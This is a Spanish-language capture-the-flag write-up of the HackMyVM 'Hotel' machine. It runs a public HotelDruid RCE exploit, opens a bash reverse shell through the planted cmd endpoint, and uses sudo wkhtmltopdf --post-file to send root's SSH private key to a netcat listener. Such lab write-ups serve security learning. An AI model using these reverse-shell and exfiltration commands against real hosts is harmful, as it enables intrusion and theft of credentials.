cd ~/blog

~/writeups/hmv/009-hotel.md

009 - Hotel

easy Linux hmv 19-10-2023
HotelDruid RCE (CVE-2022-22909)Credential leak via ttylogsudo wkhtmltopdf SSRF file exfiltration
hackmyvm.eu/machines/machine.php?vm=Hotel

~1 min de lectura


Comenzamos con un escaneo general y luego uno específico de puertos:

nmap -sC -sV -p22,80 -oN 02-targeted 192.168.1.60
Nmap scan report for 192.168.1.60
Host is up (0.00029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 06:1f:a2:25:19:45:2b:2f:44:cc:74:7a:e2:9b:ab:ac (RSA)
|   256 6f:b9:da:fb:eb:6b:4c:de:33:63:b7:ce:f0:2f:f7:cd (ECDSA)
|_  256 84:fb:1d:5c:4c:c6:60:e8:47:d8:2f:a0:92:8e:fb:18 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title:  Hoteldruid
|_http-server-header: nginx/1.18.0
MAC Address: 08:00:27:38:05:13 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 19 21:50:39 2023 -- 1 IP address (1 host up) scanned in 6.76 seconds

Enumeramos directorios con gobuster:

 gobuster dir -u http://192.168.1.60 -w ~/Documentos/git-clones/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
/index.html           (Status: 200) [Size: 398]
/img                  (Status: 301) [Size: 169] [--> http://192.168.1.60/img/]
/themes               (Status: 301) [Size: 169] [--> http://192.168.1.60/themes/]
/doc                  (Status: 301) [Size: 169] [--> http://192.168.1.60/doc/]
/includes             (Status: 301) [Size: 169] [--> http://192.168.1.60/includes/]
/README               (Status: 200) [Size: 204]
/api.php              (Status: 200) [Size: 0]
/COPYING              (Status: 200) [Size: 34520]
/dati                 (Status: 301) [Size: 169] [--> http://192.168.1.60/dati/]
/clienti.php          (Status: 200) [Size: 53412]

El sitio ejecuta HotelDruid, vulnerable a RCE (CVE-2022-22909). Descargamos y lanzamos el exploit, que habilita un endpoint para ejecutar comandos:

 python3 CVE_2022-22909_Hotel_Druid_3.0.3_RCE.py -t http://192.168.1.60 --noauth

 /$$   /$$             /$$               /$$       /$$$$$$$                      /$$       /$$
| $$  | $$            | $$              | $$      | $$__  $$                    |__/      | $$
| $$  | $$  /$$$$$$  /$$$$$$    /$$$$$$ | $$      | $$  \ $$  /$$$$$$  /$$   /$$ /$$  /$$$$$$$
| $$$$$$$$ /$$__  $$|_  $$_/   /$$__  $$| $$      | $$  | $$ /$$__  $$| $$  | $$| $$ /$$__  $$
| $$__  $$| $$  \ $$  | $$    | $$$$$$$$| $$      | $$  | $$| $$  \__/| $$  | $$| $$| $$  | $$
| $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      | $$  | $$| $$      | $$  | $$| $$| $$  | $$
| $$  | $$|  $$$$$$/  |  $$$$/|  $$$$$$$| $$      | $$$$$$$/| $$      |  $$$$$$/| $$|  $$$$$$$
|__/  |__/ \______/    \___/   \_______/|__/      |_______/ |__/       \______/ |__/ \_______/

Exploit By - 0z09e (https://twitter.com/0z09e)

[*] Trying to access the Dashboard.
[*] Checking the privilege of the user.
[+] User has the privilege to add room.
[*] Adding a new room.
[+] Room has been added successfully.
[*] Testing code exection
[+] Code executed successfully, Go to http://192.168.1.60/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.
[+] Example : http://192.168.1.60/dati/selectappartamenti.php?cmd=id
[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ejecutamos una reverse shell a través del endpoint:

http://192.168.1.60/dati/selectappartamenti.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.1.10/1234%200%3E%261%22

En /var/www/hotel encontramos un archivo ttylog, una grabación de sesión que reproducimos con ttyplay, donde se filtra una contraseña:

ttyplay ttylog
my passw0rd is ********

Con ella cambiamos al usuario person y obtenemos la primera flag. Revisamos sudo -l:

Matching Defaults entries for person on hotel:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User person may run the following commands on hotel:
    (root) NOPASSWD: /usr/bin/wkhtmltopdf

Podemos ejecutar wkhtmltopdf como root. Abusamos de su capacidad de hacer peticiones (--post-file) para exfiltrar la clave id_rsa de root hacia nuestra máquina (podríamos robar la flag directamente, pero es más satisfactorio obtener una shell de root):

sudo -u root /usr/bin/wkhtmltopdf --post-file 'file' /root/.ssh/id_rsa http://192.168.1.10:8081 root.pdf

Con netcat a la escucha recibimos la clave:

 sudo nc -lnvp 8081
Listening on 0.0.0.0 8081
Connection received on 192.168.1.60 56398
POST / HTTP/1.1
Host: 192.168.1.10:8081
Content-Type: multipart/form-data, boundary=b4998f3f6c9e4322b3071f11389b7d78
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/602.1 (KHTML, like Gecko) wkhtmltopdf Version/10.0 Safari/602.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: null
Content-Length: 2727
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,en,*

--b4998f3f6c9e4322b3071f11389b7d78
content-disposition: form-data; name="file"; filename="id_rsa"

-----BEGIN OPENSSH PRIVATE KEY-----
...

Solo resta conectarnos por SSH como root con la id_rsa obtenida y capturar la bandera.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados